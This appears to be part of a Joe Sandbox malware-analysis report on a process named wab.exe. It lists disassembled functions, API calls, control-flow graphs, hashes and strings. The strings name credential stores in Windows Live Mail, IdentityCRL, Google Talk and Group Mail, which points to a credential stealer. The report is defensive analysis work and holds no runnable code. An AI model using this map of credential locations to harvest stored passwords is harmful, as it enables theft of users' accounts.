                                                                                                                                                                                                                        • Part of subcall function 0040F177: RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E6C,?), ref: 0040F595
                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E6C,?), ref: 0040F5A9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                      • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                      • API String ID: 2768085393-888555734
                                                                                                                                                                                                                      • Opcode ID: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                      • Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1864ca7fcc736b3b4d801ba3f1c1f05252c21c348af15f97a92f57202a3284fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0044412E Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3662548030-0
                                                                                                                                                                                                                      • Opcode ID: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                      • Instruction ID: fc298a0057bb7b157c7d5bb9a283569fada43ed9a32b195ba4478b44b5386df1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 871beeaf43a2e3e1ebbf438e66662d4fa1d9833c620b3867bfec3142b5046d35
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E419F74D00714DFEB209FA4D8897AE7BB4BB85715F20016BF4519B2A2D7B88C82CB58
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004437D7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                                                        • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                                                        • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                                                        • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                                                        • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                        • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                        • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443866
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443881
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                                                      • Store Root, xrefs: 00443892
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                      • API String ID: 832325562-2578778931
                                                                                                                                                                                                                      • Opcode ID: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                      • Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 911bb342f14f3170cb2ff673aa6b7b07c4e29c197a8c78c2517f4db812832f04
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040EDD5 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 328 40efdf-40efea call 404780 318->328 329 40ef8f-40efb3 call 4047a0 318->329 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 330 40f036-40f044 322->330 328->320 329->328 335 40efb5-40efb8 329->335 330->315 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->328 337->336
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                                                        • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                                                        • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                                                        • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                                        • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                      • Opcode ID: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                      • Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aaa39dbd8fb085207e3379016ade5c185f92c0e596cea5d3bc0b7e8a3d19efa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004037BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 338 4037bc-40380e memset * 2 call 443a35 341 4038d4-4038d7 338->341 342 403814-403874 call 4021ad call 406ca4 * 2 strchr 338->342 349 403876-403887 _mbscpy 342->349 350 403889-403894 strlen 342->350 351 4038b1-4038cf _mbscpy call 4023d7 349->351 350->351 352 403896-4038ae sprintf 350->352 351->341 352->351
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                                                        • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                                                        • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                                                        • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                                                      • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                      • String ID: %s@yahoo.com
                                                                                                                                                                                                                      • API String ID: 317221925-3288273942
                                                                                                                                                                                                                      • Opcode ID: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                      • Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c01e396ce511f8afc2eb7639449ba7f1f99c67e08b3586f0ab7a0846487aca4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004034D6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 354 4034d6-403536 memset * 2 call 410493 357 403572-403574 354->357 358 403538-403571 _mbscpy call 406af3 _mbscat call 4033e2 354->358 358->357
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                                                        • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                                                        • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                                                        • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                      • API String ID: 3071782539-966475738
                                                                                                                                                                                                                      • Opcode ID: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                      • Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e35c848a323c92a1d31842152f609aeddade97801a3e26e866ac83a52e1d0630
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040C9F7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 363 40c9f7-40ca26 ??2@YAPAXI@Z 364 40ca28-40ca2d 363->364 365 40ca2f 363->365 366 40ca31-40ca44 ??2@YAPAXI@Z 364->366 365->366 367 40ca46-40ca4d call 40400d 366->367 368 40ca4f 366->368 370 40ca51-40ca77 367->370 368->370 372 40ca86-40caf9 call 406e26 call 4019b4 memset LoadIconA call 4019b4 _mbscpy 370->372 373 40ca79-40ca80 DeleteObject 370->373 373->372
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2054149589-0
                                                                                                                                                                                                                      • Opcode ID: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                                      • Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d475ca6c561f5eaf4fc753d3c68d3f995f62fff83656612615d29b2a36e03343
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00408344 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                                                        • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                                                        • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                                                        • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                                                        • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                                                        • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                                                        • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                                                        • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                                                        • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                                                        • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                                                        • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                                                        • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408392
                                                                                                                                                                                                                        • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                                                      • API String ID: 2959138223-1079885057
                                                                                                                                                                                                                      • Opcode ID: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                      • Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de50773ad60ad315725188ace9b51b45ce00f3af3b72c9474aab8c158646e734
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040B783 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 403 40b783-40b795 404 40b7e2-40b7f6 call 406a00 403->404 405 40b797-40b7ad call 407baf _mbsicmp 403->405 427 40b7f8 call 410411 404->427 428 40b7f8 call 404780 404->428 429 40b7f8 call 403c03 404->429 430 40b7f8 call 410166 404->430 431 40b7f8 call 40472f 404->431 410 40b7d6-40b7e0 405->410 411 40b7af-40b7c8 call 407baf 405->411 410->404 410->405 417 40b7ca-40b7cd 411->417 418 40b7cf 411->418 412 40b7fb-40b80e call 407bbf 420 40b810-40b81c 412->420 421 40b855-40b864 SetCursor 412->421 419 40b7d0-40b7d1 call 40b340 417->419 418->419 419->410 423 40b833-40b852 qsort 420->423 424 40b81e-40b829 420->424 423->421 424->423 427->412 428->412 429->412 430->412 431->412
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                                                                                      • API String ID: 882979914-1578091866
                                                                                                                                                                                                                      • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                                      • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041072B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 458 41074f-410752 448->458 459 41075e-410761 448->459 450 410797-4107a5 449->450 451 41078d-410790 449->451 454 4107b5-4107bf call 410411 450->454 451->450 453 410792-410795 451->453 453->450 456 4107a7-4107b0 453->456 462 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 454->462 463 4107ef-410802 _mbscpy 454->463 456->454 458->449 461 410754-410757 458->461 465 410768 459->465 461->449 464 410759-41075c 461->464 462->463 466 410805-410807 463->466 464->449 464->459 465->466
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                                                        • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410780
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                                                        • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                                      • API String ID: 889583718-2036018995
                                                                                                                                                                                                                      • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                                      • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004105DD Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000A.00000002.40218726430.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3473537107-0
                                                                                                                                                                                                                      • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                                      • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00410344 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                                                        • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                                                        • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
